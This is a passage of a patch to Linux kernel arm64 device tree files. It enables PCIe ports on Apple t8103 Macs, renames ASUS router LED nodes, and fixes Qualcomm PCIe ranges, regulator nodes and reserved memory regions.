+@@ -2448,19 +2463,4 @@
+ 			bias-disable;
+ 		};
+ 	};
+-
+-	spi1_pins_b: spi1-1 {
+-		pins1 {
+-			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
+-				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
+-			bias-disable;
+-			drive-push-pull;
+-			slew-rate = <1>;
+-		};
+-
+-		pins2 {
+-			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
+-			bias-disable;
+-		};
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j274.dts b/arch/arm64/boot/dts/apple/t8103-j274.dts
+index b52ddc4098939..1c3e37f86d46d 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j274.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j274.dts
+@@ -37,10 +37,12 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -48,6 +50,14 @@
+ 	};
+ };
+ 
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
++
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j293.dts b/arch/arm64/boot/dts/apple/t8103-j293.dts
+index 151074109a114..c363dfef80709 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j293.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j293.dts
+@@ -25,21 +25,6 @@
+ 	brcm,board-type = "apple,honshu";
+ };
+ 
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+-
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j313.dts b/arch/arm64/boot/dts/apple/t8103-j313.dts
+index bc1f865aa7909..08409be1cf357 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j313.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j313.dts
+@@ -24,18 +24,3 @@
+ &wifi0 {
+ 	brcm,board-type = "apple,shikoku";
+ };
+-
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+diff --git a/arch/arm64/boot/dts/apple/t8103-j456.dts b/arch/arm64/boot/dts/apple/t8103-j456.dts
+index 2db425ceb30f6..58c8e43789b48 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j456.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j456.dts
+@@ -55,13 +55,23 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+ 		local-mac-address = [00 10 18 00 00 00];
+ 	};
+ };
++
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
+diff --git a/arch/arm64/boot/dts/apple/t8103-j457.dts b/arch/arm64/boot/dts/apple/t8103-j457.dts
+index 3821ff146c56b..152f95fd49a21 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j457.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j457.dts
+@@ -37,6 +37,7 @@
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -44,12 +45,6 @@
+ 	};
+ };
+ 
+-/*
+- * Remove unused PCIe port and disable the associated DART.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
++&pcie0_dart_2 {
++	status = "okay";
+ };
+-
+-/delete-node/ &port01;
+diff --git a/arch/arm64/boot/dts/apple/t8103.dtsi b/arch/arm64/boot/dts/apple/t8103.dtsi
+index 9859219699f45..87a9c1ba6d0f4 100644
+--- a/arch/arm64/boot/dts/apple/t8103.dtsi
++++ b/arch/arm64/boot/dts/apple/t8103.dtsi
+@@ -724,6 +724,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 699 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0_dart_2: iommu@683008000 {
+@@ -733,6 +734,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 702 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0: pcie@690000000 {
+@@ -807,6 +809,7 @@
+ 						<0 0 0 2 &port01 0 0 0 1>,
+ 						<0 0 0 3 &port01 0 0 0 2>,
+ 						<0 0 0 4 &port01 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 
+ 			port02: pci@2,0 {
+@@ -826,6 +829,7 @@
+ 						<0 0 0 2 &port02 0 0 0 1>,
+ 						<0 0 0 3 &port02 0 0 0 2>,
+ 						<0 0 0 4 &port02 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+index 839ca33178b01..d94a53d68320b 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+@@ -120,7 +120,7 @@
+ };
+ 
+ &leds {
+-	led-power@11 {
++	led@11 {
+ 		reg = <0x11>;
+ 		function = LED_FUNCTION_POWER;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -130,7 +130,7 @@
+ 		pinctrl-0 = <&pins_led_17_a>;
+ 	};
+ 
+-	led-wan-red@12 {
++	led@12 {
+ 		reg = <0x12>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_RED>;
+@@ -139,7 +139,7 @@
+ 		pinctrl-0 = <&pins_led_18_a>;
+ 	};
+ 
+-	led-wps@14 {
++	led@14 {
+ 		reg = <0x14>;
+ 		function = LED_FUNCTION_WPS;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -148,7 +148,7 @@
+ 		pinctrl-0 = <&pins_led_20_a>;
+ 	};
+ 
+-	led-wan-white@15 {
++	led@15 {
+ 		reg = <0x15>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -157,7 +157,7 @@
+ 		pinctrl-0 = <&pins_led_21_a>;
+ 	};
+ 
+-	led-lan@19 {
++	led@19 {
+ 		reg = <0x19>;
+ 		function = LED_FUNCTION_LAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+index eb2a78f4e0332..343b320cbd746 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+@@ -254,7 +254,7 @@
+ 			};
+ 		};
+ 
+-		procmon: syscon@280000 {
++		procmon: bus@280000 {
+ 			compatible = "simple-bus";
+ 			reg = <0x280000 0x1000>;
+ 			ranges;
+@@ -538,7 +538,7 @@
+ 			reg = <0x1800 0x600>, <0x2000 0x10>;
+ 			reg-names = "nand", "nand-int-base";
+ 			interrupts = <GIC_SPI 37 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "nand";
++			interrupt-names = "nand_ctlrdy";
+ 			status = "okay";
+ 
+ 			nandcs: nand@0 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index 4b314435f8fd6..50367da93cd79 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -935,7 +935,7 @@
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+ 				regulator-min-microvolt = <606250>;
+-				regulator-max-microvolt = <1193750>;
++				regulator-max-microvolt = <800000>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+index fe6c415e82297..5251dbcab4d90 100644
+--- a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
++++ b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+@@ -706,8 +706,7 @@
+ &pmi8994_spmi_regulators {
+ 	vdd_s2-supply = <&vph_pwr>;
+ 
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index 5d453f11acd98..4663e23cd94f4 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -96,26 +96,31 @@
+ 			opp-microvolt = <725000>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1056000000 {
+ 			opp-hz = /bits/ 64 <1056000000>;
+ 			opp-microvolt = <787500>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1320000000 {
+ 			opp-hz = /bits/ 64 <1320000000>;
+ 			opp-microvolt = <862500>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1440000000 {
+ 			opp-hz = /bits/ 64 <1440000000>;
+ 			opp-microvolt = <925000>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1608000000 {
+ 			opp-hz = /bits/ 64 <1608000000>;
+ 			opp-microvolt = <987500>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1800000000 {
+ 			opp-hz = /bits/ 64 <1800000000>;
+ 			opp-microvolt = <1062500>;
+@@ -131,8 +136,7 @@
+ 
+ 	pmuv8: pmu {
+ 		compatible = "arm,cortex-a53-pmu";
+-		interrupts = <GIC_PPI 7 (GIC_CPU_MASK_SIMPLE(4) |
+-					 IRQ_TYPE_LEVEL_HIGH)>;
++		interrupts = <GIC_PPI 7 (GIC_CPU_MASK_SIMPLE(4) | IRQ_TYPE_LEVEL_HIGH)>;
+ 	};
+ 
+ 	psci: psci {
+@@ -437,24 +441,18 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0 0x20200000 0x0 0x10000>,
++				 <0x82000000 0x0 0x20220000 0x0 0x20220000 0x0 0xfde0000>;
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+ 
+ 			#interrupt-cells = <1>;
+ 			interrupt-map-mask = <0 0 0 0x7>;
+-			interrupt-map = <0 0 0 1 &intc 0 75
+-					 IRQ_TYPE_LEVEL_HIGH>, /* int_a */
+-					<0 0 0 2 &intc 0 78
+-					 IRQ_TYPE_LEVEL_HIGH>, /* int_b */
+-					<0 0 0 3 &intc 0 79
+-					 IRQ_TYPE_LEVEL_HIGH>, /* int_c */
+-					<0 0 0 4 &intc 0 83
+-					 IRQ_TYPE_LEVEL_HIGH>; /* int_d */
++			interrupt-map = <0 0 0 1 &intc 0 75 IRQ_TYPE_LEVEL_HIGH>, /* int_a */
++					<0 0 0 2 &intc 0 78 IRQ_TYPE_LEVEL_HIGH>, /* int_b */
++					<0 0 0 3 &intc 0 79 IRQ_TYPE_LEVEL_HIGH>, /* int_c */
++					<0 0 0 4 &intc 0 83 IRQ_TYPE_LEVEL_HIGH>; /* int_d */
+ 
+ 			clocks = <&gcc GCC_SYS_NOC_PCIE0_AXI_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_M_CLK>,
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 4294beeb494fd..ffb50e5ea2efd 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -772,10 +772,8 @@
+ 			phys = <&pcie_phy1>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x10000>,   /* downstream I/O */
+-				 <0x82000000 0 0x10220000 0x10220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x10200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x10220000 0x10220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -836,10 +834,8 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x20200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x20220000 0x20220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi b/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi
+index 67baced639c91..085d79542e1bb 100644
+--- a/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi
+@@ -280,3 +280,7 @@
+ 	vdda3p3-supply = <&pm8950_l13>;
+ 	status = "okay";
+ };
++
++&xo_board {
++	clock-frequency = <19200000>;
++};
+diff --git a/arch/arm64/boot/dts/qcom/msm8976.dtsi b/arch/arm64/boot/dts/qcom/msm8976.dtsi
+index 05dcb30b07795..c125ebcdd1e47 100644
+--- a/arch/arm64/boot/dts/qcom/msm8976.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8976.dtsi
+@@ -20,6 +20,13 @@
+ 
+ 	chosen { };
+ 
++	clocks {
++		xo_board: xo-board {
++			compatible = "fixed-clock";
++			#clock-cells = <0>;
++		};
++	};
++
+ 	cpus {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+@@ -351,6 +358,8 @@
+ 
+ 				rpmcc: clock-controller {
+ 					compatible = "qcom,rpmcc-msm8976", "qcom,rpmcc";
++					clocks = <&xo_board>;
++					clock-names = "xo";
+ 					#clock-cells = <1>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index cd77dcb558722..b8f2a01bcb96c 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -60,11 +60,6 @@
+ 			reg = <0x0 0x05000000 0x0 0x1a00000>;
+ 			no-map;
+ 		};
+-
+-		reserved@6c00000 {
+-			reg = <0x0 0x06c00000 0x0 0x400000>;
+-			no-map;
+-		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+index 7b0f62144c3ee..29e79ae0849d8 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+@@ -2,7 +2,7 @@
+ /*
+  * Copyright (c) 2015, Huawei Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2023, Petr Vorel <petr.vorel@gmail.com>
+  */
+ 
+ /dts-v1/;
+@@ -31,13 +31,18 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
++		cont_splash_mem: memory@3401000 {
++			reg = <0 0x03401000 0 0x1000000>;
++			no-map;
++		};
++
+ 		tzapp_mem: tzapp@4800000 {
+ 			reg = <0 0x04800000 0 0x1900000>;
+ 			no-map;
+ 		};
+ 
+-		removed_region: reserved@6300000 {
+-			reg = <0 0x06300000 0 0xD00000>;
++		reserved@6300000 {
++			reg = <0 0x06300000 0 0x700000>;
+ 			no-map;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+index 9b67f0d3820cd..63dda2ab06241 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+@@ -542,8 +542,7 @@
+ };
+ 
+ &pmi8994_spmi_regulators {
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+index f3d153c349188..db2282c9f68bf 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+@@ -173,8 +173,7 @@
+ 	 * power domain.. which still isn't enough and forces us to bind
+ 	 * OXILI_CX and OXILI_GX together!
+ 	 */
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8994.dtsi b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+index 9ff9d35496d21..24c3fced8df71 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+@@ -228,6 +228,11 @@
+ 			reg = <0 0xc9400000 0 0x3f00000>;
+ 			no-map;
+ 		};
++
++		reserved@6c00000 {
++			reg = <0 0x06c00000 0 0x400000>;
++			no-map;
++		};
+ 	};
+ 
+ 	smd {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 71678749d66f6..25d97cc2d08ff 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -1841,8 +1841,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0c200000 0x0c200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0c200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1895,8 +1895,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0d200000 0x0d200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0d200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1946,8 +1946,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0e200000 0x0e200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0e200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
+ 
+ 				device_type = "pci";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts b/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts
+index 9fb1fb9b85298..794e9f2ab77ab 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts
++++ b/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts
+@@ -34,7 +34,7 @@
+ &pmi8998_gpio {
+ 	button_backlight_default: button-backlight-state {
+ 		pins = "gpio5";
+-		function = "gpio";
++		function = "normal";
+ 		bias-pull-down;
+ 		qcom,drive-strength = <PMIC_GPIO_STRENGTH_NO>;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index 539382dab0ada..c8c76338ae18b 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -916,7 +916,7 @@
+ 			phy-names = "pciephy";
+ 			status = "disabled";
+ 
+-			ranges = <0x01000000 0x0 0x1b200000 0x1b200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x1b200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x1b300000 0x1b300000 0x0 0xd00000>;
+ 
+ 			#interrupt-cells = <1>;
+@@ -1514,7 +1514,7 @@
+ 			compatible = "arm,coresight-stm", "arm,primecell";
+ 			reg = <0x06002000 0x1000>,
+ 			      <0x16280000 0x180000>;
+-			reg-names = "stm-base", "stm-data-base";
++			reg-names = "stm-base", "stm-stimulus-base";
+ 			status = "disabled";
+ 
+ 			clocks = <&rpmcc RPM_SMD_QDSS_CLK>, <&rpmcc RPM_SMD_QDSS_A_CLK>;
+diff --git a/arch/arm64/boot/dts/qcom/pmi8994.dtsi b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+index a0af91698d497..0192968f4d9b3 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+@@ -49,8 +49,6 @@
+ 
+ 		pmi8994_spmi_regulators: regulators {
+ 			compatible = "qcom,pmi8994-regulators";
+-			#address-cells = <1>;
+-			#size-cells = <1>;
+ 		};
+ 
+ 		pmi8994_wled: wled@d800 {
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+index 850776c5323d1..70d5a7aa88735 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+@@ -26,7 +26,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <58 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		hid-descr-addr = <0x20>;
+ 
+ 		wakeup-source;
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+index d06cc4ea33756..8823edbb4d6e2 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+@@ -39,7 +39,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <0 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		post-power-on-delay-ms = <100>;
+ 		hid-descr-addr = <0x0001>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index e45726be81c82..4e7d93ff75c47 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -1512,7 +1512,7 @@
+ 				function = "qspi_data";
+ 			};
+ 
+-			qspi_data12: qspi-data12-state {
++			qspi_data23: qspi-data23-state {
+ 				pins = "gpio66", "gpio67";
+ 				function = "qspi_data";
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+index 17553e0fd6fd9..43d76ea8869fb 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+@@ -33,7 +33,7 @@ ap_tp_i2c: &i2c0 {
+ 		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
+ 
+ 		hid-descr-addr = <0x20>;
+-		vcc-supply = <&pp3300_z1>;
++		vdd-supply = <&pp3300_z1>;
+ 
+ 		wakeup-source;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index a407cd2579719..286d59d11f2e9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2068,7 +2068,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -3592,12 +3592,17 @@
+ 			      <0 0x88e2000 0 0x1000>;
+ 			interrupts-extended = <&pdc 11 IRQ_TYPE_LEVEL_HIGH>;
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					eud_ep: endpoint {
+ 						remote-endpoint = <&usb2_role_switch>;
+ 					};
+ 				};
+ 				port@1 {
++					reg = <1>;
+ 					eud_con: endpoint {
+ 						remote-endpoint = <&con_eud>;
+ 					};
+@@ -3608,7 +3613,11 @@
+ 		eud_typec: connector {
+ 			compatible = "usb-c-connector";
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					con_eud: endpoint {
+ 						remote-endpoint = <&eud_con>;
+ 					};
+@@ -4340,7 +4349,7 @@
+ 				function = "qspi_data";
+ 			};
+ 
+-			qspi_data12: qspi-data12-state {
++			qspi_data23: qspi-data23-state {
+ 				pins = "gpio16", "gpio17";
+ 				function = "qspi_data";
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 8363e82369854..966dca906bf07 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -902,7 +902,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x30200000 0x0 0x30200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x30200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x30300000 0x0 0x30300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1001,7 +1001,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x32200000 0x0 0x32200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x32200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x32300000 0x0 0x32300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1098,7 +1098,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
